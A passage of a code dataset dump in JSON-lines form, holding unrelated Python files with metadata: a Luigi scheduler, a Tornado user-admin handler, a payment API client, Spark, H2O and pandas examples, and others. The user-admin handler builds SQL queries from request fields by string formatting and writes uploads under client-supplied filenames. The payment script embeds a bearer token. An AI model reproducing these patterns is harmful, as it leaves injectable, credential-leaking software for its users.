DISABLED:\n ret['re_enable_able'] = task.scheduler_disable_time is not None\n if include_deps:\n ret['deps'] = list(task.deps)\n return ret\n\n def graph(self, **kwargs):\n self.prune()\n serialized = {}\n for task in self._state.get_active_tasks():\n serialized[task.id] = self._serialize_task(task.id)\n return serialized\n\n def _recurse_deps(self, task_id, serialized):\n if task_id not in serialized:\n task = self._state.get_task(task_id)\n if task is None or not task.family:\n logger.warn('Missing task for id [%s]', task_id)\n\n # try to infer family and params from task_id\n try:\n family, _, param_str = task_id.rstrip(')').partition('(')\n params = dict(param.split('=') for param in param_str.split(', '))\n except BaseException:\n family, params = '', {}\n serialized[task_id] = {\n 'deps': [],\n 'status': UNKNOWN,\n 'workers': [],\n 'start_time': UNKNOWN,\n 'params': params,\n 'name': family,\n 'priority': 0,\n }\n else:\n serialized[task_id] = self._serialize_task(task_id)\n for dep in task.deps:\n self._recurse_deps(dep, serialized)\n\n def dep_graph(self, task_id, **kwargs):\n self.prune()\n serialized = {}\n if self._state.has_task(task_id):\n self._recurse_deps(task_id, serialized)\n return serialized\n\n def task_list(self, status, upstream_status, limit=True, search=None, **kwargs):\n \"\"\"\n Query for a subset of tasks by status.\n \"\"\"\n self.prune()\n result = {}\n upstream_status_table = {} # used to memoize upstream status\n if search is None:\n filter_func = lambda _: True\n else:\n terms = search.split()\n filter_func = lambda t: all(term in t.id for term in terms)\n for task in filter(filter_func, self._state.get_active_tasks(status)):\n if (task.status != PENDING or not upstream_status or\n upstream_status == self._upstream_status(task.id, upstream_status_table)):\n serialized = self._serialize_task(task.id, False)\n result[task.id] = serialized\n if limit and len(result) > self._config.max_shown_tasks:\n return {'num_tasks': len(result)}\n return result\n\n def worker_list(self, include_running=True, **kwargs):\n self.prune()\n workers = [\n dict(\n name=worker.id,\n last_active=worker.last_active,\n started=getattr(worker, 'started', None),\n **worker.info\n ) for worker in self._state.get_active_workers()]\n workers.sort(key=lambda worker: worker['started'], reverse=True)\n if include_running:\n running = collections.defaultdict(dict)\n num_pending = collections.defaultdict(int)\n num_uniques = collections.defaultdict(int)\n for task in self._state.get_pending_tasks():\n if task.status == RUNNING and task.worker_running:\n running[task.worker_running][task.id] = self._serialize_task(task.id, False)\n elif task.status == PENDING:\n for worker in task.workers:\n num_pending[worker] += 1\n if len(task.workers) == 1:\n num_uniques[list(task.workers)[0]] += 1\n for worker in workers:\n tasks = running[worker['name']]\n worker['num_running'] = len(tasks)\n worker['num_pending'] = num_pending[worker['name']]\n worker['num_uniques'] = num_uniques[worker['name']]\n worker['running'] = tasks\n return workers\n\n def inverse_dep_graph(self, task_id, **kwargs):\n self.prune()\n serialized = {}\n if self._state.has_task(task_id):\n self._traverse_inverse_deps(task_id, serialized)\n return serialized\n\n def _traverse_inverse_deps(self, task_id, serialized):\n stack = [task_id]\n serialized[task_id] = self._serialize_task(task_id)\n while len(stack) > 0:\n curr_id = stack.pop()\n for task in self._state.get_active_tasks():\n if curr_id in task.deps:\n serialized[curr_id][\"deps\"].append(task.id)\n if task.id not in serialized:\n serialized[task.id] = self._serialize_task(task.id)\n serialized[task.id][\"deps\"] = []\n stack.append(task.id)\n\n def task_search(self, task_str, **kwargs):\n \"\"\"\n Query for a subset of tasks by task_id.\n\n :param task_str:\n :return:\n \"\"\"\n self.prune()\n result = collections.defaultdict(dict)\n for task in self._state.get_active_tasks():\n if task.id.find(task_str) != -1:\n serialized = self._serialize_task(task.id, False)\n result[task.status][task.id] = serialized\n return result\n\n def re_enable_task(self, task_id):\n serialized = {}\n task = self._state.get_task(task_id)\n if task and task.status == DISABLED and task.scheduler_disable_time:\n self._state.re_enable(task, self._config)\n serialized = self._serialize_task(task_id)\n return serialized\n\n def fetch_error(self, task_id, **kwargs):\n if self._state.has_task(task_id):\n return {\"taskId\": task_id, \"error\": self._state.get_task(task_id).expl}\n else:\n return {\"taskId\": task_id, \"error\": \"\"}\n\n def _update_task_history(self, task_id, status, host=None, worker_id=None):\n try:\n if status == DONE or status == FAILED:\n successful = (status == DONE)\n self._task_history.task_finished(task_id, successful, worker_id)\n elif status == PENDING:\n self._task_history.task_scheduled(task_id, worker_id)\n elif status == RUNNING:\n self._task_history.task_started(task_id, host, worker_id)\n except BaseException:\n logger.warning(\"Error saving Task history\", exc_info=1)\n\n @property\n def task_history(self):\n # Used by server.py to expose the calls\n return self._task_history\n","sub_path":"luigi/scheduler.py","file_name":"scheduler.py","file_ext":"py","file_size_in_byte":38414,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"611153430","text":"# Definition for a binary tree node.\n# class TreeNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution(object):\n def levelOrder(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: List[List[int]]\n \"\"\"\n if not root:\n return []\n ret, lvl = [], [root]\n while lvl:\n ret.append([node.val for node in lvl])\n lvl = [child for node in lvl for child in (node.left, node.right) if child]\n return ret\n","sub_path":"Binary Tree Level Order Traversal.py","file_name":"Binary Tree Level Order Traversal.py","file_ext":"py","file_size_in_byte":562,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"641675489","text":"\n\nfrom xai.brain.wordbase.nouns._conviction import _CONVICTION\n\n#calss header\nclass _CONVICTIONS(_CONVICTION, ):\n\tdef __init__(self,): \n\t\t_CONVICTION.__init__(self)\n\t\tself.name = \"CONVICTIONS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"conviction\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_convictions.py","file_name":"_convictions.py","file_ext":"py","file_size_in_byte":266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"424049139","text":"import os\nimport pandas as pd\nimport logging\nimport json\n\nfrom handlers.BaseHandler import BaseHandler\nfrom utils.CJsonEncoder import CJsonEncoder\nfrom utils.commons import required_login\n\nclass PersonDataHandler(BaseHandler):\n @required_login\n def post(self):\n if not 'mark' in self.json_args.keys():\n try:\n upload_path = os.path.join(os.path.dirname(os.path.dirname(os.path.dirname(__file__))), 'ufiles')\n file_metas = self.request.files.get('file', None)\n if not file_metas:\n self.write(dict(msgcode=0))\n return\n for meta in file_metas:\n filename = meta['filename']\n file_path = os.path.join(upload_path, filename)\n with open(file_path, 'wb') as up:\n up.write(meta['body'])\n return self.write(dict(msgcode=1))\n except:\n return self.write(dict(msgcode=0))\n if self.json_args['mark'] == 0:\n sql = \"SELECT SQL_CALC_FOUND_ROWS a._user_id,a._name,a._id_card,a._jurisdiction,a._workshop,a._occupation,a._technical_grade,b._name _op_user_name,a._utime FROM _user a INNER JOIN _user b ON a._op_user_id = b._user_id AND a._user_id <> 111\"\n if int(self.json_args.get('_jurisdiction')) <= 2:\n sql += \" AND a._workshop='%s'\"%self.json_args.get('_workshop')\n sql += \" ORDER BY %s %s LIMIT %s,%s\"%(self.json_args['t'],self.json_args['o'],self.json_args['c'],self.json_args['l'])\n d = self.db.query(sql)\n return self.write(json.dumps(dict(persons=d, count=self.db.get('SELECT FOUND_ROWS() c')['c']), cls=CJsonEncoder))\n if self.json_args['mark'] == 1:\n path = os.path.join(os.path.dirname(os.path.dirname(os.path.dirname(__file__))), 'ufiles/%s' % self.json_args.get('filename'))\n try:\n df = pd.read_excel(path, sheet_name=0)\n df.replace('%', '%%', regex=True, inplace=True)\n df.dropna(how=\"all\", axis=0, inplace=True)\n df.fillna(value='', inplace=True)\n df.columns = ['user_id', 'name','idCard', 'workshop', 'occupation', 'technical_grade']\n df['opId'] = self.json_args.get('_user_id')\n sql = 'INSERT INTO _user (_user_id,_name,_id_card,_workshop,_occupation,_technical_grade,_op_user_id) VALUES %s' % str(\n df.values.tolist())[1:-1].replace('[', '(').replace(']', ')')\n self.db.execute(sql)\n self.write(dict(msgcode=1))\n except Exception as e:\n logging.error(e)\n self.write(dict(msgcode=0))\n return os.remove(path)\n if self.json_args['mark'] == 2:\n try:\n self.db.execute('DELETE FROM _user WHERE _user_id IN (%s)' % ','.join(self.json_args['id']))\n return self.write(dict(msgcode=1))\n except Exception as e:\n logging.error(e)\n return self.write(dict(msgcode=0))\n if self.json_args['mark'] == 3:\n try:\n self.db.execute(\"DELETE FROM _user WHERE _workshop = '%s'\"%self.json_args['g'])\n except Exception as e:\n logging.error(e)\n return self.write(dict(msgcode=0))\n return self.write(dict(msgcode=1))\n if self.json_args['mark'] == 4:\n return self.write(json.dumps(dict(persons=self.db.query('SELECT SQL_CALC_FOUND_ROWS a._user_id,a._name,a._id_card,a._jurisdiction,a._workshop,a._occupation,a._technical_grade,b._name _op_user_name,a._utime FROM _user a INNER JOIN _user b ON a._op_user_id = b._user_id%s AND a.%s LIKE \"%%%%%s%%%%\" ORDER BY %s %s LIMIT %s,%s'%(['', ' AND a._user_id NOT IN (111,%s)'%','.join([str(z) for z in self.json_args['x']])][len(self.json_args['x'])>0], self.json_args['k'], self.json_args['v'],self.json_args['t'],self.json_args['o'],self.json_args['c'],self.json_args['l'])), count=self.db.get('SELECT FOUND_ROWS() c')['c']), cls=CJsonEncoder))\n if self.json_args['mark'] == 5:\n self.write(dict(_workshop=self.db.query('SELECT DISTINCT _workshop FROM _user'), _occupation=self.db.query('SELECT DISTINCT _occupation FROM _user'),_technical_grade=self.db.query('SELECT DISTINCT _technical_grade FROM _user')))\n if self.json_args['mark'] == 6:\n a = self.json_args['k']\n b = ''\n if len(a['_workshop']) > 0:\n b += ' AND (a._workshop = \"'+'\" or a._workshop = \"'.join(a['_workshop'])+'\")'\n if len(a['_occupation']) > 0:\n b += ' AND (a._occupation = \"'+'\" or a._occupation = \"'.join(a['_occupation'])+'\")'\n if len(a['_technical_grade']) > 0:\n b += ' AND (a._technical_grade = \"'+'\" or a._technical_grade = \"'.join(a['_technical_grade'])+'\")'\n return self.write(json.dumps(dict(persons=self.db.query('SELECT SQL_CALC_FOUND_ROWS a._user_id,a._name,a._id_card,a._jurisdiction,a._workshop,a._occupation,a._technical_grade,b._name _op_user_name,a._utime FROM _user a INNER JOIN _user b ON a._op_user_id = b._user_id %s ORDER BY %s %s LIMIT %s,%s'%(['', ' AND a._user_id NOT IN (111,%s)'%','.join([str(z) for z in self.json_args['x']])][len(self.json_args['x'])>0]+['', b][len(b) > 0],self.json_args['t'],self.json_args['o'],self.json_args['c'],self.json_args['l'])), count=self.db.get('SELECT FOUND_ROWS() c')['c']), cls=CJsonEncoder))\n if self.json_args['mark'] == 7:\n a = self.json_args['v']\n try:\n self.db.execute('UPDATE _user SET _workshop=\"%s\",_occupation=\"%s\",_technical_grade=\"%s\",_jurisdiction=\"%s\", _id_card=\"%s\",_op_user_id=\"%s\" WHERE _user_id=\"%s\"'%(a['_workshop'], a['_occupation'], a['_technical_grade'], a['_jurisdiction'], a['_id_card'], self.json_args.get('_user_id'), a['_user_id']))\n except Exception as e:\n logging.error(e)\n return self.write(dict(msgcode=0))\n return self.write(dict(msgcode=1))\n","sub_path":"server/handlers/Admin/PersonHandler.py","file_name":"PersonHandler.py","file_ext":"py","file_size_in_byte":5569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"55542125","text":"# EJEMPLO DE REGISTRO DE PAGO DE ORDENES AL API DE ARKADU\n# 2020-03-02\n\nimport json\nimport requests\n\ndef register_payment():\n \"\"\"\n Registra el pago de una orden.\n \"\"\"\n\n url = \"https://old.arkadu.com/api/shop/order/pay/\"\n headers = {\n \"Content-Type\": \"application/json\",\n \"Authorization\": \"Bearer vUQzaKhCo9LpPfBAeAetUFQvv24ioC\"\n }\n body = {\n \"amount\": \"240000.00\",\n \"order\": \"2051963\",\n \"account\": \"0100-0001-08-0006051619\",\n \"reference\": \"ABDC0000123\",\n \"created\": \"2020-01-30 05:46\",\n \"user_id\": \"109679\"\n }\n\n result = requests.post(url, data=json.dumps(body), headers=headers)\n return result\n\npago = register_payment()\nprint(pago.json())","sub_path":"third-apps/arkadu_register_payment.py","file_name":"arkadu_register_payment.py","file_ext":"py","file_size_in_byte":730,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"531566553","text":"from pyspark.sql import Row\r\nfrom pyspark.sql import SparkSession\r\nfrom pyspark.sql.types import *\r\nfrom pyspark.sql import SQLContext\r\n\r\ndef sql_context_api(spark):\r\n\r\n sc = spark.sparkContext\r\n sqlContext = SQLContext(sc)\r\n\r\n print(\"Start running SQL context API\")\r\n \r\n # createDataFrame\r\n l = [('Alice', 1)]\r\n sqlContext.createDataFrame(l).collect()\r\n res = sqlContext.createDataFrame(l, ['name', 'age']).collect()\r\n print(res)\r\n rdd = sc.parallelize(l)\r\n sqlContext.createDataFrame(rdd).collect()\r\n df = sqlContext.createDataFrame(rdd, ['name', 'age'])\r\n res = df.collect()\r\n print(res)\r\n print(\"createDataFrame API finished\")\r\n\r\n # table and cache \r\n df = spark.createDataFrame([('Alice', 5, 80), ('Alice', 5, 80), ('Alice', 10, 80)], [\"name\", \"age\", \"height\"]) \r\n sqlContext.registerDataFrameAsTable(df, \"table1\")\r\n sqlContext.cacheTable(\"table1\")\r\n sqlContext.uncacheTable(\"table1\")\r\n sqlContext.cacheTable(\"table1\")\r\n sqlContext.clearCache()\r\n # sqlContext.createExternalTable(\"table1\", schema = df2)\r\n sqlContext.dropTempTable(\"table1\")\r\n # res = df2.collect()\r\n # print(res)\r\n print(\"External, TempTable and cache API finished\") \r\n \r\n # getConf\r\n res = sqlContext.getConf(\"spark.sql.shuffle.partitions\")\r\n print(res)\r\n res = sqlContext.getConf(\"spark.sql.shuffle.partitions\", u\"10\")\r\n print(res)\r\n sqlContext.setConf(\"spark.sql.shuffle.partitions\", u\"50\")\r\n res = sqlContext.getConf(\"spark.sql.shuffle.partitions\", u\"10\")\r\n print(res)\r\n print(\"getConf API finished\")\r\n\r\n # newSession\r\n newspark = sqlContext.newSession()\r\n print(\"newSession API finished\")\r\n\r\n # range\r\n res = sqlContext.range(1, 7, 2).collect()\r\n print(res)\r\n res = sqlContext.range(3).collect()\r\n print(res)\r\n print(\"range API finished\")\r\n\r\n # read\r\n res = sqlContext.read\r\n text_sdf = sqlContext.readStream.text(\"/ppml/trusted-big-data-ml/work/examples/helloworld.py\")\r\n res = text_sdf.isStreaming\r\n print(res)\r\n print(\"read and readStream API finished\")\r\n\r\n # sql\r\n df = spark.createDataFrame([('Alice', 5, 80), ('Alice', 5, 80), ('Alice', 10, 80)], [\"name\", \"age\", \"height\"])\r\n sqlContext.registerDataFrameAsTable(df, \"table1\")\r\n df2 = sqlContext.sql(\"SELECT name AS f1, age as f2 from table1\")\r\n res = df2.collect()\r\n print(res)\r\n print(\"sql API finished\")\r\n\r\n # table\r\n df = spark.createDataFrame([('Alice', 5, 80), ('Alice', 5, 80), ('Alice', 10, 80)], [\"name\", \"age\", \"height\"])\r\n sqlContext.registerDataFrameAsTable(df, \"table1\")\r\n df2 = sqlContext.table(\"table1\")\r\n res = (sorted(df.collect()) == sorted(df2.collect()))\r\n print(res)\r\n print(\"table API finished\")\r\n\r\n # tableNames\r\n df = spark.createDataFrame([('Alice', 5, 80), ('Alice', 5, 80), ('Alice', 10, 80)], [\"name\", \"age\", \"height\"])\r\n sqlContext.registerDataFrameAsTable(df, \"table1\")\r\n res = (\"table1\" in sqlContext.tableNames())\r\n print(res)\r\n res = (\"table1\" in sqlContext.tableNames(\"default\"))\r\n print(res)\r\n print(\"tableNames API finished\")\r\n \r\n # tables \r\n sqlContext.registerDataFrameAsTable(df, \"table1\")\r\n df2 = sqlContext.tables()\r\n res = df2.filter(\"tableName = 'table1'\").first()\r\n print(res)\r\n print(\"tables API finished\")\r\n\r\n # register\r\n # strlen = sqlContext.registerFunction(\"stringLengthString\", lambda x: len(x))\r\n # res = spark.sql(\"SELECT stringLengthString('test')\").collect()\r\n # print(res)\r\n #spark.udf.registerJavaFunction(\"javaStringLength3\", \"org.apache.spark.sql.JavaStringLength\", \"integer\")\r\n #res = spark.sql(\"SELECT javaStringLength3('test')\").collect()\r\n #print(res)\r\n #print(\"register API finished\")\r\n\r\n print(\"Finish running SQL context API\")\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n spark = SparkSession \\\r\n .builder \\\r\n .appName(\"Python Spark SQL Context example\") \\\r\n .config(\"spark.some.config.option\", \"some-value\") \\\r\n .getOrCreate()\r\n\r\n sql_context_api(spark)\r\n","sub_path":"ppml/trusted-big-data-ml/python/docker-gramine/base/examples/sql_context_example.py","file_name":"sql_context_example.py","file_ext":"py","file_size_in_byte":4050,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"379703874","text":"import requests\nimport json\nfrom django.conf import settings\n\n\nclass FlowerAPI(object):\n def __init__(self):\n self.api_root = 'http://localhost:5555/api'\n self.task_api = '{}/task'.format(self.api_root)\n\n def get_all_task(self):\n url_all_tasks = '{}/tasks'.format(self.api_root)\n req = requests.get(url_all_tasks)\n resp = req.json()\n return resp\n\n def send_task_data(self, task_satelital, task_args):\n url_async_apply = '{}/async-apply/{}'.format(self.task_api, task_satelital)\n req = requests.post(url_async_apply, data=json.dumps(task_args))\n resp = req.json()\n return resp\n\n def get_task_status(self, task_id):\n url_task_status = '{}/result/{}'.format(self.tasak_api, task_id)\n req = requests.get(url_task_status)\n resp = req.json()\n return resp\n","sub_path":"satelitales/utils/flower_apy.py","file_name":"flower_apy.py","file_ext":"py","file_size_in_byte":859,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"28346791","text":"#!/usr/bin/env python\n# utf-8\n\n\"\"\"\nAssignment 15, Task 2\nJon Nations on 15 March 2016\nThis program tells you how many weekend days there are between today and the end of 2016\n\"\"\"\n\nimport datetime\n\n\ndef weekend(today, end):\n weekend_days = 0\n difference = (end - today).days\n for i in range(difference):\n current = today + datetime.timedelta(i)\n day = datetime.date.weekday(current)\n if day >= 5:\n weekend_days += 1\n print('\\nThere are', weekend_days,\n 'weekend days from today until 2016-12-31\\n')\n\n\ndef main():\n today = datetime.date.today()\n end = datetime.date(2016, 12, 31)\n weekend(today, end)\n\nif __name__ == '__main__':\n main()\n","sub_path":"answers/jonnations/task2.py","file_name":"task2.py","file_ext":"py","file_size_in_byte":704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"468019874","text":"import pandas as pd\n\ntrain = pd.read_csv('../train.csv')\ny_train = train.SalePrice\n\nprint('continuous type columns =>\\n', train.describe().columns.values)\nprint('discrete type columns =>\\n', train.describe(include=['O']).columns.values)\n\n# 補缺值:將 FireplaceQu 缺值的內容補成 'None'\ntrain['FireplaceQu'].fillna('None', inplace=True)\n\n# 補缺值:將 LotFrontage 缺值的內容補成 0\ntrain['LotFrontage'].fillna(0, inplace=True)\n\n# 補缺值:將 LotFrontage 缺值的內容用「MasVnrType為BrkFace且Foundation為PConc」的樣本其 LotFrontage 的中位數去補\nmask = (train['MasVnrArea'].isnull())\ntrain.loc[mask, 'MasVnrArea'] = train[(train['MasVnrType'] == 'BrkFace') & (train['Foundation'] == 'PConc')][\n 'MasVnrArea'].median()\n\n# 補缺值:將 PoolQC 缺值的內容補成 'None'\ntrain['PoolQC'].fillna('None', inplace=True)\n\n# 補缺值:將 Fence 缺值的內容補成 'None'\ntrain['Fence'].fillna('None', inplace=True)\n\n# 查看各欄位 missing value 的數量\nnull_count_df = pd.DataFrame(train.isnull().sum())\nnull_count_df.set_axis(['null_count'], axis=1, inplace=True)\nnull_index = null_count_df[null_count_df['null_count'] == 0].index\nprint(null_count_df.drop(null_index))\n\n# 查看各欄位 missing value 的比例\nnull_mean_df = pd.DataFrame(train.isnull().mean())\nnull_mean_df.set_axis(['null_mean'], axis=1, inplace=True)\nnull_index = null_mean_df[null_mean_df['null_mean'] == 0.].index\nprint(null_mean_df.drop(null_index).sort_values(by='null_mean', ascending=False))\n\n","sub_path":"EDA/EDA2.py","file_name":"EDA2.py","file_ext":"py","file_size_in_byte":1521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"30527070","text":"from dominate.tags import div, h2, img, p, link\nimport dominate\nimport html\n\nfrom . import news_parser, topdf\n\n\ndef createHtmlStructure(channel, limit, html_path, pdf_path):\n '''\n 1. in loop create html structure\n 2. return html_structure \n 3. or file name of pdf for send_from_directory function\n '''\n html_document = dominate.document(title=\"HTML document\")\n\n for index, item in enumerate(channel.entries):\n if (index == limit):\n break\n with html_document:\n with div():\n h2(\"Title: \" + html.unescape(item.title))\n p(\"Link: \" + item.link)\n media_content = news_parser.checkMediaContent(item)\n if (media_content):\n img(src=media_content)\n description = news_parser.getDescription(item.description)\n if (description):\n p(\"Description: \" + description)\n\n if (html_path):\n return str(html_document)\n elif(pdf_path):\n return topdf.convertHtmlToPdf(str(html_document), pdf_path)\n","sub_path":"final_task/rss_reader/converter.py","file_name":"converter.py","file_ext":"py","file_size_in_byte":1079,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"430676904","text":"#!/usr/bin/env python\n# -*- encoding: utf-8 -*-\nfrom __future__ import print_function\n\nimport h2o\nimport sys\nsys.path.insert(1,\"../../../\") # allow us to run this standalone\nfrom h2o.grid.grid_search import H2OGridSearch\nfrom h2o.estimators.gbm import H2OGradientBoostingEstimator\nfrom h2o.estimators.stackedensemble import H2OStackedEnsembleEstimator\nfrom tests import pyunit_utils\n\n\ndef airline_gbm_random_grid():\n air_hex = h2o.import_file(path=pyunit_utils.locate(\"smalldata/airlines/allyears2k_headers.zip\"), destination_frame=\"air.hex\")\n myX = [\"DayofMonth\",\"DayOfWeek\"]\n\n hyper_parameters = {\n 'learn_rate':[0.1,0.2],\n 'max_depth':[2,3,4],\n 'ntrees':[5,10,15]\n }\n\n search_crit = {'strategy': \"RandomDiscrete\",\n 'max_models': 5,\n 'seed' : 1234,\n 'stopping_rounds' : 3,\n 'stopping_metric' : \"AUTO\",\n 'stopping_tolerance': 1e-2\n }\n\n air_grid = H2OGridSearch(H2OGradientBoostingEstimator, hyper_params=hyper_parameters, search_criteria=search_crit)\n air_grid.train(x=myX, y=\"IsDepDelayed\", training_frame=air_hex, nfolds=5, fold_assignment='Modulo', keep_cross_validation_predictions=True, distribution=\"bernoulli\", seed=5678)\n\n assert(len(air_grid.get_grid())==5)\n print(air_grid.get_grid(\"logloss\"))\n\n\n\n stacker = H2OStackedEnsembleEstimator(selection_strategy=\"choose_all\", base_models=air_grid.model_ids)\n print(\"created H2OStackedEnsembleEstimator\")\n stacker.train(model_id=\"my_ensemble\", y=\"IsDepDelayed\", training_frame=air_hex)\n print(\"trained H2OStackedEnsembleEstimator\")\n predictions = stacker.predict(air_hex) # training data\n print(\"predictions for ensemble are in: \" + predictions.frame_id)\n\n # Check that the model can be retrieved\n assert stacker.model_id == \"my_ensemble\"\n modelcopy = h2o.get_model(stacker.model_id)\n assert modelcopy is not None\n assert modelcopy.model_id == \"my_ensemble\"\n\n # golden test for ensemble predictions:\n assert round(predictions[0, \"YES\"], 4) == 0.4327, \"Expected prediction for row: {0} to be: {1}; got: {2} instead.\".format(0, 0.4327, round(predictions[0, \"YES\"], 4))\n assert round(predictions[1, \"YES\"], 4) == 0.5214, \"Expected prediction for row: {0} to be: {1}; got: {2} instead.\".format(1, 0.5214, round(predictions[1, \"YES\"], 4))\n assert round(predictions[2, \"YES\"], 4) == 0.4666, \"Expected prediction for row: {0} to be: {1}; got: {2} instead.\".format(2, 0.4666, round(predictions[2, \"YES\"], 4))\n\n air_grid = H2OGridSearch(H2OGradientBoostingEstimator, hyper_params=hyper_parameters, search_criteria=search_crit)\n air_grid.train(x=myX, y=\"IsDepDelayed\", training_frame=air_hex, distribution=\"bernoulli\")\n assert(len(air_grid.get_grid())==5)\n print(air_grid.get_grid(\"logloss\"))\n\n # added this part to check h2o.get_grid is working properly\n fetch_grid = h2o.get_grid(str(air_grid.grid_id))\n assert len(air_grid.get_grid())==len(fetch_grid.get_grid())\n\n\nif __name__ == \"__main__\":\n pyunit_utils.standalone_test(airline_gbm_random_grid)\nelse:\n airline_gbm_random_grid()\n","sub_path":"h2o-py/tests/testdir_algos/gbm/pyunit_gbm_random_grid.py","file_name":"pyunit_gbm_random_grid.py","file_ext":"py","file_size_in_byte":3141,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"226279030","text":"import math\nimport os\nimport multiprocessing as mp\nfrom functools import partial\n\nimport waves as wv\nimport fractals as fr\n\ndef pre_path(shape=None):\n # check if folder exists, if not - create it\n dr = 'wavefiles/%s' % shape\n if os.path.isdir(dr) is False:\n os.makedirs(dr)\n \ndef path(shape=None, freq=None, contraction=1, growth=1, fertility=None): \n return 'wavefiles/%s/fr%s_c%s_g%s_f%s.wav' % (shape,freq,contraction,growth,fertility)\n\ndef _krotka(contractions, growth, fertility):\n for c in contractions:\n if fertility:\n for g in range(2, growth+1):\n for f in range(1,g):\n yield (c,g,f)\n else:\n yield (c,4,2)\n\ndef _gen(contraction, growth, fertility, \n freq = None, time = None, shape = None, curve = None, wave = None, damp = 1):\n wv.write_wavefile(path(shape, freq, contraction, growth, fertility),\n wv.compute_samples(wave(curve(freq, contraction, growth, fertility),damp),\n 96000*time))\n return\n\ndef run(contractions, growth, fertility, shape, curve, wave, freq, time, damp):\n pre_path(shape)\n pool = mp.Pool(6)\n pool.starmap(partial(_gen, freq = freq, time=time, shape=shape, curve=curve, wave=wave, damp=damp), _krotka(contractions, growth, fertility))\n pool.close()\n pool.join()\n\n## generator\n\nbs_fr = 65.4 # base frequensy of the sound in Hz\ntime = 4 # lenght of the sample in seconds\ncontractions = [1.1,1.3,1.5,1.7]\ngrowth = 4\n\n\n#\n#print('generating: train kahunas')\n#run(contractions, growth, False, 'train_kahuna', fr.train, fr.kahunas, bs_fr, time)\n#print('completed: train kahunas')\n#\n#print('generating: train combers')\n#run(contractions, growth, False, 'train_comber', fr.train, fr.combers, bs_fr, time)\n#print('completed: train combers')\n#\n#print('generating: train froths')\n#run(contractions, growth, False, 'train_froth', fr.train, fr.froths, bs_fr, time)\n#print('completed: train froths')\n#\n#print('generating: whip kahunas')\n#run(contractions, growth, True, 'whip_kahuna', fr.whip, fr.kahunas, bs_fr, time)\n#print('completed: whip kahunas')\n#\n#print('generating: whip combers')\n#run(contractions, growth, True, 'whip_comber', fr.whip, fr.combers, bs_fr, time)\n#print('completed: whip combers')\n#\n#print('generating: whip froths')\n#run(contractions, growth, True, 'whip_froth', fr.whip, fr.froths, bs_fr, time)\n#print('completed: whip froths')\n\nprint('generating: train froths')\nrun(contractions, growth, False, 'train_froth', fr.train, fr.froths, bs_fr, time, 6)\nprint('completed: train froths')","sub_path":"fractave/generator.py","file_name":"generator.py","file_ext":"py","file_size_in_byte":2538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"177268799","text":"import numpy as np\nfrom ..helper_funcs.helper import calculate_probability\n\ndef stochastic_universal_sampling(population):\n new_mating_pool = []\n\n calculate_probability(population)\n r = np.random.uniform(0, 1 / len(population))\n relative_probability = 0.0\n current_member = 0\n\n while(len(new_mating_pool) < len(population)):\n relative_probability += population[current_member].get_probability()\n # import pdb; pdb.set_trace()\n\n while(r <= relative_probability):\n new_mating_pool.append(population[current_member])\n r += 1 / len(population)\n\n current_member += 1\n\n return new_mating_pool\n","sub_path":"files/selection/sus.py","file_name":"sus.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"17732658","text":"\"\"\"\nInteligencia Artificial aplicada a Negocios y Empresas - \nCaso Practico 2\n\"\"\"\n# Fase de Prueba\n\n# Importar las librerias y otros ficheros de python\nimport os\nimport numpy as np\nimport random as rn\nfrom keras.models import load_model\nimport environment\n\n# Configurar las semillas para reprodicibilidad\nos.environ [\"PYTHONHASHSEED\"] = \"0\"\nnp.random.seed(42)\nrn.seed(12345)\n\n# CONFIGURACIÓN DE LOS PARÁMETROS\nnumber_actions = 5 # cambiar la dirección y valor de la temperatura\ndirection_boundary = (number_actions - 1)/2 # valor central el que diferencia el de calentar y enfriar\ntemperature_step = 1.5\n\n# CONSTRUCCION DEL ENTORNO CREANDO UN OBJETO DE LA CLASE ENVIRONMENT\nenv = environment.Environment(optimal_temperature = (18.0,24.0), initial_month = 0, initial_number_users = 20, initial_rate_data = 30)\n\n# CARGA DE UN MODELO PRE ENTRENADO\nmodel = load_model(\"model.h5\")\n\n# ELECCIÓN DEL MODO DE ENTRENAMIENTO\ntrain = False\n\n# EJECUCIÓN DE UN AÑO DE SIMULACIÓN EN MODO INFERENCIA \nenv.train = train\ncurrent_state, _, _ = env.observe()\nfor timestep in range(0, 12*30*24*60):\n q_values = model.predict(current_state)\n action = np.argmax(q_values[0])\n \n if (action < direction_boundary):\n direction = -1\n else:\n direction = 1\n energy_ai = abs(action - direction_boundary) * temperature_step\n next_state, reward, game_over = env.update_env(direction, energy_ai, int(timestep/(30*24*60)))\n current_state = next_state\n\n \n# IMPRIMIR LOS RESULTADOS DEL ENTRENAMIENTO AL FINAL DEL EPOCH\nprint(\"\\n\")\nprint(\" - Energía total gastada por el sistema con IA: {:.0f} J.\".format(env.total_energy_ai))\nprint(\" - Energía total gastada por el sistema sin IA: {:.0f} J.\".format(env.total_energy_noai))\nprint(\"ENERGÍA AHORRADA: {:.0f} %.\".format(100*(env.total_energy_noai - env.total_energy_ai)/env.total_energy_noai ))\n","sub_path":"2. 